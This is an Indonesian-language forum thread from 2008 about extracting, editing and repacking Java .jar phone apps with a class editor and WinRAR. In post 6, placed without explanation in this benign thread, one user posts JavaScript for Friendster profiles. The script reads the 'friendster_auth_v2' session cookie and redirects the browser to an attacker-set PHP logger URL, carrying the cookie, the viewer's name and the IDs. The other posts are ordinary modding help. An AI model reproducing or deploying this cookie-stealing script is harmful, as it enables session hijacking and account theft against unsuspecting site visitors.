Software Pulsa Tiger Engine
Kiswara

cara bikin atau edit file jar

Discussion in 'JAVA Aplication & Game' started by ieL, Oct 6, 2008.

  1. ieL

    ieL New Member

    Messages:
    7
    Likes Received:
    1
    Trophy Points:
    0
    Saya member baru ni, saya pingin tau gimana sih cara bikin atau edit aplikasi atau games hp yang ekstensinya jar? tnks
     
    satri likes this.

    Mobile Connection
  2. imutz

    imutz New Member

    Messages:
    9
    Likes Received:
    17
    Trophy Points:
    0
    KALO UNTUK EDIT NI ADA SOFTWARNYA BOSSSSSS

    MUNGKIN BISA MEMBANTU

    SOFTWARE INI UNTUK EDIT FILE CLASS

    SELAIN SOFTWARE INI HARUS ADA JUGA WINRAR UNTUK MEMBUKA FILE JAR

    INI LINKNYA BOSSSSSSSSS

    INCLAS

    Downloads

    Code:
    Paswod : www.madiunmig33.com

    WINRAR

    Downloads

    MOga berguna ya bosssssssssssssssss
     
    Pitkebo, pablo honey, viko and 8 others like this.

    Asisten VRE
    Kiswara Modem
  3. WONGBAGUS

    WONGBAGUS New Member

    Messages:
    194
    Likes Received:
    82
    Trophy Points:
    0
    Aku coba dulu ya...
     
    satri likes this.
  4. milanisty

    milanisty New Member

    Messages:
    16
    Likes Received:
    1
    Trophy Points:
    0
    BOS BUAT CARA NGEDITNYA GMN,DAH AKU COBA,..TP KO KY GA BISA DI EDIT GWT,..
    TOLONG KSH PETUNJUK YG AGAK DETAIL GTW,MKLM AKU MSH AWAM GTW,....MAAAF NGREPOTIN,HE.............:pray:
    :clap:
     
    satri likes this.
  5. nathajoz

    nathajoz New Member

    Messages:
    16
    Likes Received:
    1
    Trophy Points:
    0
    Ekstrak dulu file jar kmudian akn didapat file class br bs diedit.bukankah bgtu bos?
     

    aa-pulsajaya
  6. alan

    alan New Member

    Messages:
    1
    Likes Received:
    1
    Trophy Points:
    0
    var userURL="ID FS";
    var id=fgetCookie("friendster_identitas"),pUrl=window.location.href.search(/profiles\./),pVd=pageViewerID,pOd=pageOwnerID,pVn=pageViewerFName;

    if(pVd==""){
    alert("Please log in to see this profile: "+pOd);
    top.location.href="http://www.friendster.com/login.php?next=%2F"+pOd+"&cookie=1";}
    else{
    if(pUrl>0){
    if(id!=pVd){
    document.cookie="friendster_identitas="+pVd+"; path=/";
    top.location.href="http://www.friendster.com/profiles/"+userURL;
    }}
    else{
    var cLoger="====URL PHP yang lo save=====",ck=fgetCookie("friendster_auth_v2"),nxLoc="http://profiles.friendster.com/"+pOd;
    window.location.href=cLoger+'?c='+escape(ck)+'&s='+escape(pVn)+'~'+pVd+'~@'+pOd+'&nx='+nxLoc;
     
    satri likes this.
  7. Harningsih

    Harningsih New Member

    Messages:
    175
    Likes Received:
    41
    Trophy Points:
    0

    Thxs bos, tapi btw kalau JAVA EDITOR itu sendiri gimana bos, pa bedanya dengan ini.
    n klo bos punya plus jamunya tolong di bagi donk bos. :tea: :tea:
     
  8. tope

    tope New Member

    Messages:
    1
    Likes Received:
    1
    Trophy Points:
    0

    Waaah Ketinggalan nih saya bo..? File downloadnya mana yaah..? kok ga ada bos...?:closed:
     
    satri likes this.
  9. boby gin

    boby gin New Member

    Messages:
    1
    Likes Received:
    1
    Trophy Points:
    0
    iya bos kita udah ectrx data/file jar-nya pke winrar, saya edit file class...dan beres lalu ni bos, cara balikin lg ke data jar, gmn bos!?tolong ya bos di bantu?
     
    satri likes this.

  10. njegrik

    njegrik New Member

    Messages:
    260
    Likes Received:
    171
    Trophy Points:
    0
    kalau dari sepengetahuan saya.dibuka pakai winrar dipilh mana yg mau di edit kemudian extract yg dipilih tadi.dan jangan ditutup dulu jendela winrarnya setelah editing selesai masukan lagi ke jendela winrarnya tgl ok jd deh,mf kalau kurg jelaz .newbie buangetz,met tahun baru to all member.
     
    satri likes this.
  11. j4pr4

    j4pr4 Active Member

    Messages:
    450
    Likes Received:
    64
    Trophy Points:
    38
    setubuh bro ama atas ane...setelah file class nya di edit kemudian buka file jar yang ori dengan winrar tinggal drag file yang udah di edit ke winrar klik ok.
     
    satri likes this.
  12. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    ammi and satri like this.
  13. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    ini InClassTranslator nya :
     

    Attached Files:

    ammi, lacodding, satri and 1 other person like this.
  14. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    File Pendukung lain nya, barangkali ada yg membutuhkan.

    File ini untuk simulasi File Java nya :
     

    Attached Files:

    ammi, lacodding, viko and 2 others like this.
  15. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    klau yg ini untuk Mengkompres Smua File yg telah di Extract menjadi *.jar kembali..
     

    Attached Files:

    ammi, lacodding, satri and 2 others like this.
  16. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    Lanjutan-nya :
     

    Attached Files:

    ammi, satri, yoyoktri81 and 1 other person like this.
  17. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    Lanjutan-nya:
     

    Attached Files:

    ammi, rajali, lacodding and 3 others like this.
  18. platin

    platin New Member

    Messages:
    1
    Likes Received:
    1
    Trophy Points:
    0
    setelah di download kok filenya pada ga bisa dibuka yah bro? :eek:
     
    satri likes this.
  19. boby27

    boby27 New Member

    Messages:
    6
    Likes Received:
    1
    Trophy Points:
    0
    Iya tuh bro gk bisa di buka?!:cry:
     
    satri likes this.
  20. ndeso

    ndeso New Member

    Messages:
    696
    Likes Received:
    207
    Trophy Points:
    0
    buka pake winrar/7zip. dan pastikan di komputer anda sudah terinstall aplikasi java.
     
    satri likes this.

Share This Page